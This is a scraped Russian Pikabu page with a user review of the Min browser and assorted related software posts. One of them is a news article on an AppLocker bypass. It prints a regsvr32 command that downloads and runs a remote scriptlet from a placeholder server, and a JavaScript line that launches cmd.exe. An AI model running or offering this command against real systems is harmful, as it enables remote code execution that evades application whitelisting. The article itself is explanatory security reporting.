2

Min - просмотр в интернете без отвлекающих факторов

дело было так искал на гит-хабе хороший браузер и наткнулся на него

Min - просмотр в интернете без отвлекающих факторов Браузер, Минимализм, Программа, Github, Открытый исходный код, Лёгкий, Защита, Длиннопост, Windows

и вот скачал я его.

запустил.

что я могу сказать про него

Полнотекстовый поиск посещенных страниц

● Блокировка рекламы и трекера

● Задачи (группы вкладок)

● Интеграция менеджера паролей

● Темная тема

скришоты

Min - просмотр в интернете без отвлекающих факторов Браузер, Минимализм, Программа, Github, Открытый исходный код, Лёгкий, Защита, Длиннопост, Windows
официальный сайт

от автора

Вкладки в Min занимают меньше места, давая вам больше возможностей для просмотра веб-страниц. Страницы, которые вы еще не просматривали, постепенно исчезают, позволяя увидеть, что важно, а режим фокусировки скрывает другие вкладки, чтобы вы не отвлекались.

СПАСИБО !

Найдены дубликаты

+1

Браузер в браузере - так себе удовольствие (Electron)!

раскрыть ветку 2
0

есть такое)

раскрыть ветку 1
0

https://www.qutebrowser.org/ Вот минимализм )

+1
Здравствуйте! А ссылку дайте, пожалуйста.
раскрыть ветку 3
+1
раскрыть ветку 2
0
Спасибо!
раскрыть ветку 1
Похожие посты
1902

Hard Disk Manager

В честь 25-летия, компания Paragon раздаёт лицензию для программы Hard Disk Manager.

Hard Disk Manager является мощным многофункциональным и удобным в обращении средством для управления ресурсами жесткого диска, осуществления операций обслуживания, утилизации и восстановления, управления процессом загрузки, обеспечения безопасности системы и данных.

Чтобы получить ключ, нужно перейти по ссылке https://www.paragon-software.com/hdm-25-anniversary/#downloa... , заполнить поля и вам на e-mail придёт ключ и ссылка на дистрибутив.

272

Убийца процессов

История создания.

На работе достался мне комп не очень мощный, пользователей до меня было много. При старте небольшая память в 2 Гб забивалась многочисленными процессами. Удалить проги я не мог так-как что нужно, а что нет, а что может понадобиться я не знаю. Тем более что тачку дали с правами "тебе тачка вообще не положена!". Поэтому сижу и помалкиваю. А работать за компом хотелось бы комфортнее, а не ловить "пьяную" мышку.

Поэтому я стал освобождать оперативную память от тех процессов которые я не использую на данный момент, через диспетчер задач стал завершать не нужные процессы. Комп работает 24 часа 7 дней в неделю, то есть постоянно, но бывают моменты когда комп перезагружается... и снова удалять чуть больше двух десятков процессов вручную. Мне это надоело и я решил спросить у гугла можно ли это как-то автоматизировать. Я немножко программирую в Делфи, поэтому запрос был такой "убить процесс в Делфи".

Нашёл ответ WinExec('taskkill /f /im процесс',SW_HIDE);

Отлично! подумал я, ща напишу программку которая убивала бы все нежелательные процессы одной кнопкой. Когда писал, устала рука, начинал подумывать о списке. Когда дописал и нажал кнопку все процессы зашитые в екзешник были убиты. Память освободилась, процессор облегчённо вздохнул. Без лишних процессов машинка ожила и можно было комфортно работать, в том числе открыть и не одну вкладку в браузере. Каждый раз я пользовался этой кнопкой при перезагрузке ПК. Потом я заметил, что некоторые процессы появляются и исчезают, а самые назойливые нужно убивать много раз! А есть такие программы что запустишь, а они запустят ещё пару спутников процессов и когда закроешь основную программу спутники-шпионы остаются висеть. Некоторые даже тормозят проц, что не есть хорошо.

Так я решил бороться с ними и возродить идею со списком.

Сделал три списка белый, чёрный и текущий и таймеров два штуки, чтобы мониторили процессы и убивали из чёрного списка появившиеся процессы. Во второй версии я переделал алгоритм и во главу угла поставил белый список. Всё что не в белом списке, убивалось и заносилось в чёрный. Поначалу было не просто, убивал нужные процессы винды и комп замерал и не реагировал или уходил в синий экран и на перезагрузку. Было принято решение загрузиться в безопасном режиме и записать минимум необходимых процессов для нормальной работы винды.

Первые тесты программки удивили и обрадовали... при запуске калькулятора тот мигнул и исчез. Зная что за запуск калькулятора отвечает процесс calc.exe, я добавил его в белый список. Добавил функцию ручной миграции процессов из списка, а также историю "убийства", а то мигнёт что-то, а что фиг узнаешь! Некоторые программки запускают несколько процессов и их надо знать. Также добавил статистику по процессам и за весь день, ну чтоб знать процессы которые назойливые. Когда программка заработала меня осенила мысль...да это же самодельный антивирусник. Давно мечтал сделать что-то подобное, потому-что постоянные обновления и поиски ключей уже з@eб@ли надоели, но думал что антивирусник это сложно сделать. Как оказалось всё просто: таймер, списки и команда taskkill.

Помню как отказался от антивирусников в далёком 2009, винда пожила месяца три, червей и вирусов нахватался знатно, почти все .exe побило червями, архивы только целые остались.

Первую версию программки написал давно, осенью 2018, весь 2019 пользовался на своём компе без каких либо антивирусников, оттачивал и добавлял нужные функции. Больше года полёт нормальный. Делал программку для себя, но мысль что надо поделиться не оставляла меня, программка полезная, сколько в инете есть жалобы на процессы которые грузят систему, сколько искал я решение по этой проблеме так ничего и не нашёл. Как не откроешь запрос, на первой странице " этот процесс хороший, он от Майкрософт, находиться там и там-то, весить столько-то,... а жрёт за десятерых". Долго не решался отдать программку в массы, так как в мире действует закон "не делай добра не получишь зла". Всегда найдутся люди которые не смогут пройти мимо, обязательно обосрут, поноют и перекрутят.

Ну да ладно, работа у них такая. А у меня была работа сделать вторую версию этой программки более красивой, с лучшим алгоритмом и более интуитивно понятную для простого пользователя.

Я даю Вам в руки инструмент взять под контроль все процессы на своём ПК, теперь Вы сами формируете свою базу процессов, которые будут работать на Вашем ПК, а какие будут автоматически завершать свою работу.

немного инструкции.

Есть три списка процессов: текущие, белый и чёрный список.

На каждом из них можно клацнуть правой мышкой и вызвать меню.

Убийца процессов Программа, Windows, Длиннопост

Прежде чем вызвать меню Вы должны кликнуть левой мышкой на процесс который Вам нужен, потом правой мышкой вызвать меню.

Убедитесь что Вы поймали именно тот процесс который Вам нужен, в сплывающим меню сверху должно быть его полное название с расширением!

Можно открыть папку где лежит файл (не всегда, но всё же).

1. показывает список новых процессов которые посмели запуститься без Вашего разрешения.

2. история за сегодня и предыдущие дни.

3. текущая история

4. статистика дня, сколько раз убивались процессы. Можно отследить назойлевые процессы.

5. статистика по процессу. кликните по процессу левой мышкой и правой мышкой выберите в меню [статистика процесса]

откроется статистика за все дни сколько раз этот процесс убивался.

7. - 10. сворачивает и разворачивает списки.

11. настройки

Полностью инструкция в папке программы.
Программа тестировалась на Windows 7. Ваша Windows и Ваши процессы могут отличаться от моих. Поэтому при первом запуске она все текущие процессы записывает в базовый список и переходит в режим защиты когда все новые процессы будут убиваться, Вы даже калькулятор не запустите. Вернее запустить то Вы сможете, только через секунду он будет уже в чёрном списке. Как редактируется базовый список и как сделать так чтобы в этом списке были только те процессы которые нужны для минимальной работы Windows написано на последних страницах.

Скачать: https://yadi.sk/d/qt3s2dPcmiqT8g

Показать полностью 6
223

RDP Wrapper Library: RDP для самых маленьких

Всем привет, на связи снова Леонид.

Продолжая серию предновогодних постов, поговорим об удаленном доступе.

RDP появился в 1998 году в Windows Server NT 4.0 Terminal Services. Все эти годы протокол обрастал свистелками - перделками и теперь обладает широким функционалом. Пробежимся кратко по истории:

RDP 5.0 - печать на локальные принтеры

RDP 5.1 - появление звука

RDP 5.2 - подключение локальных ресурсов

RDP 6 - поддержка нескольких мониторов

RDP 6.1 - появление Easy Print Priver

RDP 7 - появление NLA, Aero over RDP, Direct2D/3D, DirectShow

RDP 10 - поддержка H264, появление автомасштабирования.

Версии протокола с незначительными я пропустил.

К сожалению, в домашних версиях систем  заблокирована серверная часть протокола, осталась только клиент удаленного рабочего стола. Чего только народ не вытворял с библиотекой termsrv.dll. Как её только не лопатили. Разумеется, всё это нарушает лицензионное соглашение.

Не так давно появился новый проект на GitHub. Особенностью его является то, что он включает поддержку протокола RDP без изменения системных  файлов Windows. Лицензионной статус проекта не определен.

Кроме того, он позволяет создавать несколько подключений к компьютеру, а это уже точно нельзя.

Проект представляет из себя несколько bat - файлов для установки, обновления и удаления RDP Wrapper Library. В комплекте идет программs RDPCheck.exe для проверки возможности подключения и RDPConf.exe для настройки.

RDP Wrapper Library: RDP для самых маленьких Rdp, Windows, Github

Как видите, у меня сервис не установлен, но RDP доступен - это потому что Windows 10 Professional.

Расписывать тут в принципе нечего. Пост так сказать, в копилку полезных программ.

253

Windows 10 и скриншоты

После прочтения Софт для работы в связке смартфона и ПК. Без проводов и бубнов хотел написать комментарий, но он получался слишком большой и я решил оформить его в виде поста.

Я не очень люблю пользоваться сторонними приложениями если есть встроенные, сторонние захламляют комп, доверия к ним меньше и к тому же через некоторое время про них тупо забываешь(если редко пользуешься) или наоборот, настолько привыкаешь, что на чужом компе недоумеваешь, почему не работает.

И так, как сделать скриншот без использования сторонних приложений:

Все мы знаем что нажатие на клавишу PrtSc(Print Screen) помещает снимок экрана в буфер обмена, но скорее всего меньше людей знает что Alt+PrtSc делает скриншот текущего приложения.

Win+PrtScr - сохраняет скриншот в папку Изображения\Снимки экрана

Win+Alt+PrtScr - сохраняет скриншот приложения, правда почему-то с помощью сервиса Xbox и в папку Видео\Клипы 😊, видимо изначально было сделано для скриншотов из игр.

Win+Shift+S - при нажатии можно выбрать область экрана которая попадет в буфер обмена.(Работает только с установленным обновлением Windows Creators Update)

Приложение Ножницы, находится в Пуск - Стандартные - Windows, или нажмите Win+S и наберите "ножницы".

Windows 10 и скриншоты Программа, Софт, Полезное, Windows, Windows 10, Длиннопост
Windows 10 и скриншоты Программа, Софт, Полезное, Windows, Windows 10, Длиннопост

Но и это не все, совсем скоро(а может кому-то уже и прилетело) выйдет следующее крупное обновление Windows 10 в котором появится новый инструмент для скриншотов, вызов можно будет настроить на клавишы Win+Shift+S или PrtSc:

Все вышеописанное относится к Windows версии 10, на других версиях не проверялось.

Первый пост, и т.д. и т.п. )

P.S. В Windows немало скрытых возможностей, нажмите например Win+. 😊

Показать полностью 2
114

Предупреждение по обновлению до Firefox Quantum (версия 57)

Предупреждение по обновлению до Firefox Quantum (версия 57) Firefox, Mozilla, Браузер, Программа, Компьютер, Обновление

Новый Firefox Quantum (версия 57) может убить кучу ваших расширений и плагинов.

Если они для вас критичны, то рекомендуется пока не обновляться до новой версии.

Если вы всё же обновились и хотите вернуть всё назад, то вот старые версии

https://ftp.mozilla.org/pub/firefox/releases/

Здесь версия 56.0.2

https://ftp.mozilla.org/pub/firefox/releases/56.0.2/

Здесь старый frigate-2.2.1 (ещё не подверженный Роскомнадзору)

https://forum.mozilla-russia.org/viewtopic.php?pid=745790#p7...

Отключить автообновление можно

Меню -> Настройки ->Основные ->Обновление Firefox

снять "Автоматически устанавливать обновления"

Почему вообще такое происходит: https://support.mozilla.org/ru/kb/npapi-plugins

И оттуда же ссылка на версию, в которой _пока-что_ всё будет ок:  https://www.mozilla.org/ru/firefox/organizations/all/

Полный бэкап профиля (с расширениями и всеми прочими настройками) можно снять программой MozBackup - http://mozutil.mozilla-russia.org/backup/index-ru.html

За информацию и ссылки спасибо

#comment_100128680

#comment_100117406

Показать полностью
85

Mozilla заявила, что полностью переработанный Firefox работает вдвое быстрее

Mozilla заявила, что полностью переработанный Firefox работает вдвое быстрее Mozilla, Firefox, Браузер, Компьютер, Программа, Обновление, Видео

Компания Mozilla открыла для скачивания новую, 57-ю версию браузера Firefox (Firefox Quantum). Разработчик произвел крупные изменения "под капотом": программа загружает и рендерит веб-страницы вдвое быстрее, чем год назад, а пользовательский интерфейс остается отзывчивым даже при сотни открытых вкладок.

Mozilla смогла добиться лучшей производительности благодаря проекту Quantum, который направлен на оптимизацию различных частей браузера, использования графического процессора, а также движков обработки JavaScript-кода и таблиц стилей CSS. Quantum задействует больше функций языка программирования Rust, а компоненты Servo расширяют возможности GPU-параллелизации.

В компании называют новый релиз крупнейшим обновлением более чем за 10 лет — в Firefox 57 было переписано 75% кода. За счет этого браузер работает "в 2 раза быстрее и потребляет на 30% меньше памяти, чем Chrome", говорится на сайте Mozilla.

Улучшения затронули унифицированную поисковую строку и функцию защиты от слежения, появилась возможность сохранять контент "на потом" при помощи сервиса Pocket, добавилась встроенная поддержка WASM и WebVR для игра и приложений виртуальной реальности.

https://hitech.vesti.ru/article/689918/

985

Защита от Bad Rabbit

Защита от Bad Rabbit Плохой кролик, Защита, Windows, Bad Rabbit

Как известно компьютеры пользователей под управлением Windows атакованы новым вирусом-вымогателем Bad Rabbit, создавшим уже множество проблем на Украине и России.

Специалисты в области кибербезопасности обнаружили способ защититься от этого вируса Как пишет в своем Telegram-канале компания Group-IB, для этого необходимо создать файл C:\windows\infpub.dat и поставить ему права «только для чтения».

Эксперты обещают, что в этом случае даже при попадании вредоносного кода на компьютер файлы не будут зашифрованы.

Group-IB утверждает, что в BadRabbit используется сходный код с вирусом NotPetya, который в июле этого года поразил ряд энергетических, телекоммуникационных и финансовых компаний.

UDP (Спасибо @Yak0r):

Защита от Bad Rabbit Плохой кролик, Защита, Windows, Bad Rabbit
27

Бета-релиз MuliNET

Привет, Пикабу!

Диплом защищен и вот и настал день выпуска бета версии моего приложения MuliNET. Для тех, кто не понимает о чем идет речь: http://pikabu.ru/story/programma_dlya_sozdaniya_skhem_vyishi...

Устанавливаем .NET Framework 4.5.1, если он у вас не установлен, а также не забудьте установить шрифты значков.

Скачиваем архив по ссылке в конце поста, распаковываем zip-архив в любое место и запускаем exe-файл с именем «MuliNET».

Можно также ассоциировать файлы схем с программой, через меню «Открыть с помощью», отметив пункт «Всегда использовать это приложение для открытия .mlnt файлов».

Как будет свободное время, сделаю таблицу с горячими клавишами для тех, кому лень читать всплывающие подсказки. Они в большинстве своем стандартные, а клавиши при просмотре (прокрутка и масштабирование) аналогичны браузеру Chrome.

Бета-релиз MuliNET Программа, Windows, Mulinet, Вышивка крестом

Ссылка на архив с программой: https://1drv.ms/u/s!AjB0zEd4JkBPbpUG9oTjlbmkAII

.NET Framework 4.5.1: https://www.microsoft.com/ru-ru/download/details.aspx?id=407...

Шрифты: https://1drv.ms/u/s!AjB0zEd4JkBPcbihdwnKaNjybpA

Ссылка на страницу в VK, посвященную проекту: https://vk.com/mulinet

Спасибо всем, кто ждал бета-релиза!

2683

Программа для создания схем вышивки

Привет, Пикабу!

Уже давно читаю пикабу, решил сегодня зарегистрироваться, чтобы поделиться плодами своего творчества дипломного проекта.

Я разрабатываю программу для создания схем вышивки крестом из изображений. Она уже почти готова. После защиты диплома я выложу ее в общий доступ для всех желающих безвозмездно, т.е. даром. На разработку меня сподвигла жена, которая искала подобную программу, но так и не нашла подходящую для себя (ну ТЫЖПРОГРАММИСТ, напиши). Сначала это стало моим небольшим хобби, а затем плавно перетекло в тему магистрантского дипломного проекта, потому что темы толком то и не было.

Подходит время защиты диплома, а ко мне подходит время родину защищать. Поэтому хотелось бы поделиться программой со всеми.

Итак, что же она из себя представляет:

Программа для создания схем вышивки Программа, Вышивка крестом, Windows, Первый пост, Длиннопост
Программа для создания схем вышивки Программа, Вышивка крестом, Windows, Первый пост, Длиннопост

Состоит из двух частей: главного окна и «мастера».

Главное окно:

Мастер:

Что «умеет»:

• открывать изображения форматов: *.gif (не анимации), *.bmp, *.jpg, *.jpeg и *.png (втч и картинки с прозрачным фоном);

• редактировать изображения: обрезка, поворот, отражение;

• преобразовывать изображение в схемы с настройками размера, палитры и т.п.;

• отображать схемы в нескольких режимах с линейками и сеткой;

• редактировать схемы (простейшее рисование, изменение палитры)

• сохранять схемы;

• печатать схемы.

Дополнительно реализовал:

• поддержку горячих клавиш;

• отмену действий редактирования;

• перетаскивание файлов (картинки и собственный формат);

• ассоциацию файлов («открыть с помощью»).

Работает на ПК под управлением ОС Windows 7/8/8.1/10 с установленным .NET Framework 4.5.1.

Ну и печать:

Заказчик доволен, диплом написан.

Страница в VK, посвященная проекту: https://vk.com/mulinet

Всем спасибо за внимание!

Показать полностью 6
52

Опубликован эксплоит для уязвимости нулевого дня в Microsoft Windows.

Опубликован эксплоит для уязвимости нулевого дня в Microsoft Windows. Securitylab, Zero Day, Уязвимость, Windows, Github
Проблема затрагивает Windows 10, 8.1, Server 2012 и Server 2016.

В протоколе SMBv3 (Server Message Block) обнаружена уязвимость нулевого дня, позволяющая вызвать отказ в обслуживании ОС Windows и потенциально выполнить произвольный код с привилегиями ядра. Проблема затрагивает ряд версий операционной системы, в том числе Windows 10, 8.1, Server 2012 и Server 2016. PoC-эксплоит для уязвимости опубликован на портале GitHub.

Проблема существует из-за некорректной обработки операционной системой Windows трафика с вредоносного SMB-сервера. В частности, Windows осуществляет некорректную обработку ответа сервера, содержащего слишком большое количество байт, следуя структуре, указанной в SMB2 TREE_CONNECT Response. Подключение уязвимого клиента Windows к вредоносному SMB-серверу приведет к ошибке в драйвере mrxsmb20.sys, сообщается в предупреждении специалистов US-CERT.

В настоящее время патч, исправляющий уязвимость, недоступен. В качестве временной меры для предотвращения эксплуатации проблемы эксперты рекомендуют блокировать исходящие SMB-соединения (порты TCP 139/445 и UDP 137/138).

В середине января нынешнего года группировка Shadow Brokers выставила на продажу архив, содержащий хакерские инструменты и эксплоиты для уязвимостей в Windows, похищенные у связанной с АНБ группы Equation Group. В числе прочих в списке фигурирует эксплоит для уязвимости нулевого дня в протоколе SMB. По всей видимости, речь идет о проблеме, описанной выше. За данный эксплоит хакеры просят 250 биткойнов. Несмотря на предыдущие заявления о намерении отойти от дел, участники группировки не теряют надежду заработать на похищенных инструментах для взлома.  

4757

Как убрать «вирус» и самопроизвольно открывающиеся вкладки браузера

Описание проблемы: через какой-то промежуток времени открывается вкладка в браузере с каким-либо левым сайтом, чаще всего «Вулкан Удачи».

Столкнулась с этой проблемой и моя жена, после того как её «подружки-тру-софтер-инсталляторы» поставили ей офис.

Куча проверок различными антивирусами, всякими поисковиками Malware и т.д. не принесли результатов - вкладка открывается, причем сайты с которыми она открывается периодически меняются.

В общем искал я проблему, касперский молчал, реестр в порядке... так и забил я на это дело.

Осенило меня лишь через неделю. Я решил заглянуть в «Планировщик задач Windows»

К моему удивлению я обнаружил там несколько задач, не меньше я был рад когда посмотрел, что конкретно делает задача. А было все просто, задача с периодичностью в 22 минуты запускала браузер с передачей в параметре адреса сайта. Впервые это решение было опубликовано мной на StackOverflow, а сегодня руки дошли опубликовать его здесь, т.к. в интернете нигде я не нашел данного решения.

Как убрать «вирус» и самопроизвольно открывающиеся вкладки браузера Вирус, Антивирус, Windows, Браузер, Вкладки, Google Chrome, Firefox, Internet Explorer

Суть соответственно проста, требуется удалить из планировщика эти задачи.

Все эти задачи имеют общий вид имени а-ля «InternetX», где X какая-либо буква (B, C, D)

Так же видел задачу, которая запускала не конкретный браузера, а приложение Windows (OpenWith.exe), которое предлагало пользователю выбор браузера, в котором открыть сайт.

Как убрать «вирус» и самопроизвольно открывающиеся вкладки браузера Вирус, Антивирус, Windows, Браузер, Вкладки, Google Chrome, Firefox, Internet Explorer

После удаления этих задач вкладки открываться перестанут.

Показать полностью 1
72

В тему о JS-залипалках

В тему о JS-залипалках Жидкость, Браузер, 2D, Игры, Github

(Ну, не совсем JS, конечно, но в браузере потыкать можно)

Тут

Пожалуй, одна из самых классных подобных штук, которую почему-то очень сложно найти, и мало кто о ней слышал

Ну и все исходники открыты, всегда можно посмотреть что как устроено

393

Как всё начиналось (компьютеры глазами обычного пользователя). Поисковики

Я помню Яндекс еще личинкой. Не тем супермощным порталом, который по данным статистики является самым посещаемым сайтом в России и 25-ым по посещаемости в мире. Многие даже уже и не помнят, что Яндекс изначально был не сайтом, а... программой. Обычная компьютерная программа с убогим интерфейсом и минимальнейшим набором функционала (скриншот в инете пытался найти, не нашел). Шарясь по софтовым сайтам, я как-то набрел на эту диковину, она только вышла. Это был конец девяностых. Весила она средненько, не помню уже сколько. Но помню, что для диалапного соединения на 56 кбит/с (а по факту стабильные 33) мне ее веса показалось многовато, поэтому качать не стал. Да и зачем поисковая программа вообще нужна? Чушь какая-то.

Прошло пару месяцев, прогу эту я стал постоянно встречать на разных софтовых сайтах, пока один раз, качая всё подряд, взял да и скачал её. Установил, запустил.

Вылезло убогое окошечко, где предлагалось вбить что-нибудь. Да что тут думать, я сразу вбил «Саратов». И вот спустя почти полминуты или минуту (да, искалось тогда очень долго) высветился результат: целых 12 (двенадцать) упоминаний слова «Саратов» нашла шайтан-машина на различных ресурсах мира. Ни фига себе. Я был поражен. Благодаря этому запросу я нашел несколько сайтов, которые посвящены моему городу, уау! Конечно, всё это были странички с бесплатников типа Народа. Нашелся один серьезный сайт с историей города и даже прообразом ленты новостей. Было обнаружено и самое ценное — крупный форум, где, оказывается, бурлила жизнь. А я и не знал. Я вообще не знал, что существуют форумы. После этого вечера я стал там зависать, а дальше уже понеслось по наклонной.

Что же касается программы, то вскоре у нее появилась вторая версия (вторая не в смысле номер два, а вторая по счету, цифру уже не помню). Она была чуть покрасивше и чуть пофункциональнее. Спустя год она выдала по запросу «Саратов», как сейчас помню, уже под 70 ресурсов. Сайт у Яндекса если и был, то реально стал известен толпе лишь году к 2001-2002-му. Там не было ничего. Только строка для поиска. Приглядевшись, я вскоре стал понимать, что создатели поисковика делают упор на сайт, а не на прогу, которая развиваться перестала, а вскоре и вовсе начала хромать, выдавая результатов меньше, чем браузерная версия.

В форумных средах долгое время ходили рассказы о двух студентах вроде как из Москвы, которые на коленке, в общаге, написали эту прогу, а потом создали сайт Yandex и поддерживают его. Это уже сейчас, читая историю компании, понимаешь, что это был миф. Уже в конце 90-х Яндекс была крупная компания и там крутились нешуточные коммерческие страсти. «Бедными студентами, самоучками и бессребренниками» и не пахло. К слову, в настоящее время Яндекс — это вовсе не российская компания. Судя по той же Википедии, ее головной офис находится в Норвегии, а в РФ — так, представительство, оформленное как ООО. Председатель директоров — вовсе не Ваня и не Петя, а не очень русский Джон Бойнтон.

Запомнился мне Яндекс и по другой причине. Моя девушка, с которой жили вместе, писала диплом, и вспомнила мои бормотания про то, что есть такая штука, сайт, с помощью которого можно в итнернете найти любую информацию. Запустил я ей браузер, открыл Яндекс, показал поисковую строку: вот, сюда пишешь запрос, сюда кликаешь и ждешь. Ушёл налить себе тархуна, и когда вернулся, аж поперхнулся им от смеха. Моя зазноба, впервые видящая перед собой поисковик и не совсем понимающая, что это, написала в строке запроса:

«Здравствуйте! Мне нужно найти для дипломной работы еду в творчестве Н.В.Гоголя. Если можно, пришлите пожалуйста не только тексты, но и библиографические ссылки. Срок — до конца этой недели».

А потом всё долго удивлялась:

- А я думала там люди сидят и как-то по книгам ищут. Ну не может же компьютер воспринимать что я пишу и сам искать!

Показать полностью
2683

Krita - свободный графический редактор

После более года разработки состоялся релиз свободного растрового графического редактора Krita 3.0, развиваемого для художников и иллюстраторов. Редактор поддерживает многослойную обработку изображений, предоставляет средства для работы с различными цветовыми моделями и обладает большим набором средств для цифровой живописи, создания скетчей и формирования текстур. Для оценки возможностей редактора сформированы самодостаточные сборки, оформленные в виде пакета AppImage, который можно установить в различных дистрибутивах GNU/Linux. Для загрузки также подготовлены бинарные сборки для OS X и Windows.

Krita - свободный графический редактор Софт, Open Source, Программа, Графический редактор, Релиз, Linux, Windows, Os X, Видео, Длиннопост

Основные новшества:

• Преход на использование библиотеки Qt 5 и компоненты KDE Frameworks 5, что упростило распространение Krita в виде обособленного многоплатформенного продукта;

• Добавление полноценных инструментов для создания рисованной покадровой анимации. При создании анимации возможно применение всех существующих инструментов рисования Krita. Также доступны анимированные растровые слои, шкала времени, панель анимации, рабочий стол аниматора, гибкие средства управления скоростью воспроизведения, раскрашивание с учётом межкадровых переходов, импорт набора изображений в виде анимированного слоя, экспорт изображений из анимированного слоя, импорт/экспорт в формате CSV, экспорт для Spriter scml;

• Режима мгновенного предпросмотра изменений

• Функции выделения/дублирования/редактирования сразу нескольких слоёв. Упрощённый процесс слияния слоёв. Режим быстрого выделения всех, видимых или заблокированных слоёв. Возможность группировки слоёв. Более наглядная навигация по слоям. Возможность пометки слоя цветом и фильтрации слоёв по меткам

• Новые эффекты и фильтры

Krita - свободный графический редактор Софт, Open Source, Программа, Графический редактор, Релиз, Linux, Windows, Os X, Видео, Длиннопост

• Расширенный интерфейс выбора цвета

• Возможность импорта/экспорта кистей из файлов в форматах GBR и GIH;

• Адаптация интерфейса для экранов HiDPI;

• Проведена работа над увеличением производительности и повышением эффективности работы с памятью, в том числе добавлена поддержка OpenMP в G'Mic для распараллеливания вычислений при работе фильтров, обеспечено кэширование данных для воспроизведения анимации, задействован OpenGL 3.0 для ускорения рисования на очень больших холстах, включено отбрасывание кадров для сохранения скорости воспроизведения анимации на маломощных системах;

• При отображении анимации по умолчанию задействован новый режим "Drop Frames", обеспечивающий постоянную заданную частоту кадров, путём отбрасывания кадров при нехватке мощности CPU/GPU;

Полностью переписан код для работы с планшетами и формирования вывода;

---------------------------------

Ссылка на новость[ru] и сайт программы[eng]

Показать полностью 2 3
1351

Команда для обхода WINDOWS APPLOCKER умещается в один ТВИТ

Независимый исследователь Кейси Смит (Casey Smith) обнаружил интересный способ обхода средства безопасности Windows AppLocker. Техника Смита не требует привилегий администратора. Всё, что понадобится для атаки, это лишь короткая команда, код которой уместится даже в один твит.
Команда для обхода WINDOWS APPLOCKER умещается в один ТВИТ Взлом, Windows, Хакеры, Команда, Обход, Защита, Безопасность, Длиннопост

Windows AppLocker впервые появился в системах Microsoft с релизом Windows Server 2008 R2 и Windows 7. По сути, эта функция позволяет администратору задавать определенные правила для приложений, определяя, что может и чего не может запустить пользователь (или группа пользователей). К примеру, можно запретить запуск на компьютере любых программ, которые не относятся к рабочей деятельности сотрудника.

Тогда как администраторы привыкли доверять AppLocker, Кейсти Смит пишет, что обойти его ограничения возможно, более того, проделать это весьма легко.

Фактически Смит предложил использовать не по назначению Regsvr32 и с его помощью скачать из интернета определенный файл. Для этого потребуется команда вида:

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

Исполнение этой команды приведет к скачиваю XML-файла, который приведет к запуску cmd.exe. Кроме того, cmd.exe можно заменить на любую другую программу, и не важно, какие ограничения установлены в AppLocker: программа всё равно успешно запустится.

Как это работает? Regsvr32 является частью ОС и может использоваться для регистрации или отмены регистрации файлов COM скриптов в реестре Windows. Если разбирать команду Смита: /s в коде обязывает Regsvr32 работать тихо, /n приказывает не использовать DllRegisterServer, /u означает, что мы пытаемся осуществить отмену регистрации, а параметр /i отвечает за ссылку и DLLinstall. В свою очередь, scrobj.dll – это Script Component Runtime.

Смит обнаружил, что Regsvr32 обработает URL и доставит на машину заданный файл через HTTP или HTTPS. Исследователь добавил немного JavaScript к своему XML-файлу и инициировал его исполнение через запрос на отмену регистрации .DLL. Таким образом, обход AppLocker становится весьма простым трюком, веь любой пользователь может отправить запрос на отмену регистрации.

«Это не слишком задокументированная [функция], но regsvr32.exe может принять ссылку на скрипт. Чтобы уязвимость сработала, поместите код (VB или JS) внутрь элемента <registration>», — пишет Смит.

Так, в описанном выше примере JavaScript использует ActiveX:

var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");

Атака Смита не требует привилегий администратора, может быть выдана за обычную сессию HTTP, и не должна оставить ни единого следа на жестком диске жертвы, так как не затрагивает реестр и работает непосредственно с памятью. Никаких патчей на данный момент не существует, разве что Regsvr32 можно отрезать от интернета при помощи файервола.

Исследователь опубликовал на GitHub свой proof-of-concept, который может пригодиться системным администраторам и пентестерам.

Команда для обхода WINDOWS APPLOCKER умещается в один ТВИТ Взлом, Windows, Хакеры, Команда, Обход, Защита, Безопасность, Длиннопост

Материалы:

Windows AppLocker https://technet.microsoft.com/ru-ru/library/ee424367.aspx

Кейсти Смит пишет об обходе http://subt0x10. блогспот .ru/2016/04/bypass-application-whitelisting-script.html

Regsvr32 https://technet.microsoft.com/en-us/library/bb490985.aspx

XML-файл запускающий cmd.exe https://gist.githubusercontent.com/subTee/24c7d8e1ff0f560209...

Как параметр /i отвечает за ссылку и DLLinstall https://msdn.microsoft.com/en-us/library/windows/desktop/bb7...

Proof-of-conceptна исследователя на GitHub https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d...

Пруф https://xakep.ru/2016/04/22/applocker-bypass/

Показать полностью 1
1304

Гнева пост, или как мэйл накручивает счетчик

знаю старая тема, но презираю мэйл.сру с каждым подобным случаем еще больше, по порядку ...
Разбирая старые папки в облаке, наткнулся на нужную прогу, распаковывая ее, ничего предосудительного не заметил. Спустя 2 минуты комп заиграл совершенно по другому, самостоятельно устанавливались говнопрограммы по тиму фирменного и неповторимого браузера Амиго (кто им вообще пользуется?), спутники и еще куча очень нужного софта от мэйл. Ладно, думаю, недоглядел где то галочку при установке программы, так нет же - устанавливая ее повторно (специально) палил весь процесс и никаких соглашений там нету. Самое смешное (или грустное) что ранее при установке этой программы подобного высера не было. Но это еще пол беды, спустя N-ное время, как я удалил новоиспеченный софт, у меня случилось дежавю. Только на этот раз, мэйл решил заполнить пространство винчестера всяким высером типо браузера Комета (блять это что еще?) который уже запустился и изменил все настройки в Гугл Хром, куча всяких ярлыков на раб. столе (в виде ахуенных наверняка игр)... Спасибо мэйл за время, потраченное с пользой, не говоря уже о том, что все это время комп тормозил несусветно. Мэйл, прекращай уже.
Получилось слишком много букав, кто дочитает, спасибо что выслушали.
Похожие посты закончились. Возможно, вас заинтересуют другие посты по тегам: